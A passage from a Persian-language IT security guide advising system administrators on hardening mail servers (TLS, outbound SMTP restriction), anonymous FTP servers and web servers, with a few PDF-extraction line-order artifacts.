‫ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻋﻠﻴﻪ ﺷﻤﺎ ﺍﻗﺪﺍﻣﺎﺕ ﻗـﺎﻧﻮﻧﻲ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ‪ ٢٠٩ .‬ﻳـﻚ ﺭﻭﺵ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ‬
‫ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﺩﺍﺧﻠﻲ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﻪ ﻣﻘﺎﺻـﺪﻱ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺷﺒﻜﻪ ﺩﺍﺭﻧﺪ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﺑﺮ ﺁﻧﻬﺎ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤـﻲ ﺩﺍﺭﻳـﺪ‪ .‬ﻳـﻚ ﺭﺍﻩ ﻋﻤﻠـﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ‬
‫ﻣﻨﻈﻮﺭ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﺮﻭﻥﺭﻭﻧﺪﻩ ﺍﺯ ﭘﻮﺭﺕ ‪) TCP 25‬ﭘﻮﺭﺕ ﺳـﺮﻭﻳﺲ ‪ (SMTP‬ﺭﺍ ﺩﺭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺴﺪﻭﺩ ﻛﻨﻴـﺪ ﻭ ﺗﻨﻬـﺎ ﺑـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﭼﻨﻴﻦ ﺍﺭﺗﺒﺎﻃﺎﺗﻲ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ‪.‬‬

‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺻﺤﺖ‬
‫ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ‪ MTA‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ‪ TLS‬ﺭﺍ ﻣﺠﺎﺯ ﻳﺎ ﺍﺟﺒـﺎﺭﻱ ﻛﻨﻨـﺪ‪ .‬ﭘﺮﻭﺗﻜـﻞ‬
‫‪ SMTP‬ﺑﮕﻮﻧﻪﺍﻱ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﻛﻪ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ‪ - STARTLS‬ﺁﻏﺎﺯﮔﺮ ﮔﻔﺘﮕﻮﻱ ‪ - TLS‬ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ TLS‬ﻣﺆﻛـﺪﹰﺍ‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻫﻢ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻫﻢ ﺍﺯ ﺻﺤﺖ ﭘﻴﺎﻣﻬﺎ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩ‬
‫ﻧﻴﺰ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺻﺤﻴﺢ ﻣﺘﺼﻞ ﺍﺳﺖ‪.‬‬
‫ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ‪ ،‬ﺍﮔﺮ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﺘﺎﻥ ﺳﺮﻭﻳﺲ ‪ POP‬ﻳﺎ ‪ IMAP‬ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺑﻴﺸﺘﺮ ﻣﺸﺘﺮﻳﺎﻥ ﻓﻌﻠﻲﺗﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ‬
‫ﺷﻤﺎ ﺍﺗﺼﺎﻻﺕ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ ‪ SSL/TLS‬ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ؛ ﺍﻟﺒﺘﻪ ﺑﻪ ﺷﺮﻃﻲ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺍﺗﺼﺎﻻﺕ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻭ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻻﺯﻡ ﺑﺪﺍﻧﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﺑﺼﻮﺭﺕ ﭘﻴﺶﻓﺮﺽ‪ ،‬ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺑـﺪﻭﻥ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﻟﺰﺍﻣﻲ ﻛﺮﺩﻥ ﺍﺗﺼﺎﻻﺕ ‪ SSL/TLS‬ﺑﺎﻋﺚ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻫﻤﻴﻨﻄـﻮﺭ‬
‫‪٢١٠‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺁﻧﺎﻥ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺭﻣﺰﻧﮕﺎﺭﻱﻧﺸﺪﺓ ‪ POP‬ﻳﺎ ‪ IMAP‬ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺮ ﻭﺏ‪ ،‬ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺻﻨﺪﻭﻕ ﭘﺴﺘﻲﺷﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻴﻢ‪ .‬ﻳﻚ ﻣﺰﻳﺖ ﻣﻬـﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪webmail‬‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ ‪ SSL/TLS‬ﺍﻳﻤﻦ ﺷﻮﺩ‪ ،‬ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻫﻤﺔ ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ﺧﻮﺍﻫﻨـﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﺯ‬
‫ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﻣﻦ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ‪.‬‬

‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‬


‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪ FTP‬ﺩﺭﺩﺳﺮﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﺩﺭﺩﺳﺮﻫﺎ ﺁﻧﭽﻨـﺎﻥ ﺍﺳـﺖ ﻛـﻪ ﻃﺒـﻖ‬
‫ﻼ ﺩﺭ ﺷﺒﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺩﺭﻋﻮﺽ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻓﺎﻳﻠﻬﺎ‬ ‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﺮﻭﺯ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺻ ﹰ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﻧﻴﺰ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ scp‬ﻭ ‪) sftp‬ﺑﺨﺸﻲ ﺍﺯ ﻣﺠﻤﻮﻋﺔ ‪ (SSH‬ﻭ ﻳﺎ‬
‫‪ SSL‬ﺍﻳﻤﻦﺷﺪﺓ ‪ Web-DAV‬ﻣﻨﺘﻘﻞ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺑﻨﺎ ﺍﺳﺖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‪ ٢١١‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﺗﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ‪ download‬ﻭ ‪ upload‬ﻛﻨﻨﺪ‪،‬‬
‫ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪:‬‬
‫ﺑﺎ ﺩﻗﺖ ﻣﺴﺘﻨﺪﺍﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﺧﻮﺩ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺪﺭﺳﺘﻲ ﻣﺤـﺪﻭﺩﺓ ﻓﺎﻳﻠﻬـﺎﻱ ﻧﺎﺷـﻨﺎﺱ ﺭﺍ ﺗﻨﻈـﻴﻢ ﻛﻨﻴـﺪ ﺗـﺎ‬ ‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺍﺯ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺨﺺ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻓﺎﻳﻞ ‪ download‬ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺷﺎﺧﻪﻫﺎ ﻗﺎﺩﺭ ﺑـﻪ ﺣـﺬﻑ ﻓﺎﻳﻠﻬـﺎ‬
‫ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﻭ ﻳﺎ ﺗﻐﻴﻴﺮ ﺳﺎﺧﺘﺎﺭ ﺷﺎﺧﻪﻫﺎ ﻧﺒﺎﺷﻨﺪ؛‬

‫‪ ۲۰۹‬ﺩﺭﺣﻘﻴﻘﺖ ﺣﺠﻢ ﺑﺎﻻﻱ ﺍﺭﺳﺎﻝ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺿﻮﺍﺑﻂ ﻗﺎﻧﻮﻧﻲ ﻧﺎﻛﺎﺭﺁﻣﺪﻱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﻧﺪ ﺁﻧﭽﻨﺎﻥ ﺑﻪ ﺍﻋﺘﺒﺎﺭ ﻣﻠﻲ ﺁﻥ ﻛﺸﻮﺭﻫﺎ ﺿﺮﺑﻪ ﺯﺩﻩ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﺑﻌﻀﹰﺎ ﺍﺯ ﭘﺬﻳﺮﻓﺘﻦ ﻫﺮ ﻧﺎﻣﺔ ﺍﻛﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺑﺎﺷﺪ ﺳﺮ ﺑﺎﺯ ﻣﻲﺯﻧﻨﺪ‪.‬‬
‫‪ ۲۱۰‬ﻫﻢ ‪ POP‬ﻭ ﻫﻢ ‪ IMAP‬ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻲ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﻧﺸﺪﻩ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﻣﻨﺘﻘﻞ ﻧﻤﻲﻛﻨﻨﺪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣـﺎ ﻓﻌـﺎﻝﻛـﺮﺩﻥ ﺁﻧﻬـﺎ‬
‫ﺑﻴﺶ ﺍﺯ ‪ SSL/TLS‬ﺯﺣﻤﺖ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻛﻨﺘﺮﻝ ﺻﺤﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺭﺍ ﺗﺄﻣﻴﻦ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
‫‪211 Anonymous FTP Server‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٥٨‬‬

‫ﺍﺯ ﺍﺭﺍﺋﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺼﻮﺭﺕ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻓﺸﺮﺩﻩﺷﺪﻩ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﺭﺷﻴﻮﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ‬ ‫•‬
‫ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺣﺘﺮﺍﺯ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ ،Unix‬ﺍﮔﺮ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﻗﺎﺑﻠﻴﺖ ﻧﻤﺎﻳﺶ ﺷـﺎﺧﻪﻫـﺎ ﺭﺍ‬
‫ﺩﺍﺭﺩ‪ ،‬ﺣﺘﻲ ﺑﻪ ﻓﺎﻳﻞ ‪ ls‬ﻧﻴﺰ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﻧﺪﻫﻴﺪ؛‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﻄﺒﺎﻕ ‪ uid‬ﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﺑﺎ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﺑـﺮﺍﻱ‬ ‫•‬
‫ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﻳﻚ ﻓﺎﻳﻞ ﺛﺎﻧﻮﻳﻪ ﺩﺭﺳﺖ ﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻧﻪﭼﻨﺪﺍﻥ ﻣﻬـﻢ‬
‫ﺭﺍ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﻳﺎ ﺍﺻ ﹰﻼ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﺘﻮﺍﻧﻨﺪ ‪uid‬ﻫﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ(؛ ﻭ‬
‫ﺍﮔﺮ ﺍﺟﺎﺯﺓ ‪ upload‬ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﺑﻪ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻣﺠـﺰﺍ ﺍﺯ ﺷـﺎﺧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺁﻧﻬـﺎ ‪ download‬ﻫـﻢ ﺍﻧﺠـﺎﻡ‬ ‫•‬
‫ﻣﻲﺷﻮﺩ ﺑﺪﻫﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ ‪ download‬ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ‪upload‬ﺷﺪﻩ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴـﺐ ﺷـﻤﺎ ﺭﺍﻩ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺻﺤﻴﺢ ﺍﺯ ﺗﺮﺍﻓﻴﻚ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﺧﻮﺩ ﺑﺮﺍﻱ ‪ download‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻩﺍﻳـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ‪upload‬ﺷﺪﻩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺧﺎﺻﻲ ﺩﺭ ﻧﺎﻡ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻳﻲ‬
‫ﻛﻪ ‪ upload‬ﺩﺭ ﺁﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺩﺭ ﻳﻚ ‪ partition‬ﻣﺠﺰﺍ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﭘﺮ ﺷﺪﻥ ﺁﻥ ﺁﺳﻴﺒﻲ ﺑﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻧﻤﻲﺯﻧـﺪ‪ .‬ﺑـﻪ ﺍﻳـﻦ‬
‫ﺗﺮﺗﻴﺐ ﺍﺯ ﻣﺤﻮ ﻭ ﺣﺬﻑ ﺷﺪﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻳﻚ ﺗﻬﺎﺟﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺑﻄﻮﺭ ﻛﻠﻲ ﺳﺮﻭﻳﺲ ‪ FTP‬ﻏﻴﺮﻧﺎﺷﻨﺎﺱ‪ ٢١٢‬ﺍﺭﺍﺋﻪ ﻧﺪﻫﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ ﺗﻮﻧـﻞ ‪ VPN‬ﻭ ﻳـﺎ ﻳـﻚ‬
‫ﭘﻮﺷﺶ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺎﻧﻨﺪ ‪ (http://safetp.cs.berkley.edu) SafeTP‬ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪.‬‬

‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‬


‫ﺩﺭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺻﻔﺤﺎﺕ ﻭﺏ‪ ،‬ﻗﻮﺍﻋﺪ ﻋﻤﻮﻣﻲ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺑﻲ ﺍﻧﺘﺨﺎﺏ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺑﺎ ﻧﮕﺎﻩ ﺧﺎﺹ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻭ ﺍﺯ ﺳﺎﺑﻘﺔ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺑﻲ ﻧﻴﺰ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺎ ﺩﻗﺖ ﻣﺴﺘﻨﺪﺍﺕ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻭﺏ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺁﻧﺮﺍ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﺩ‪ .‬ﺍﺯ ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ "‪ "guest‬ﺑﻪ ﺳﻴـﺴﺘﻢ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻫﺴﺘﻨﺪ ﺭﺍ ﺑﻪ ﻫﻤﺎﻥ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﻻﺯﻡ ﺍﺳـﺖ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻣﺤـﺪﻭﺩ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ administrator‬ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ ‪ ،Windows‬ﺍﮔـﺮ ﻣﺠﺒـﻮﺭ‬
‫ﻫﺴﺘﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍﻫﺒﺮﻱ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﻧﺎﻡ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ administrator‬ﺭﺍ ﺑﻪ ﻧﺎﻡ ﺩﻳﮕﺮﻱ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﻛﻪ ﺣـﺪﺱﺯﺩﻥ‬
‫ﺁﻥ ﺩﺷﻮﺍﺭﺗﺮ ﺑﺎﺷﺪ‪ .‬ﺭﻭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ Unix‬ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﺭﺍ ﺑﻜﻠﻲ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﻠﺰﻡ ﻧﻤﺎﻳﻴﺪ ﻛﻪ‬
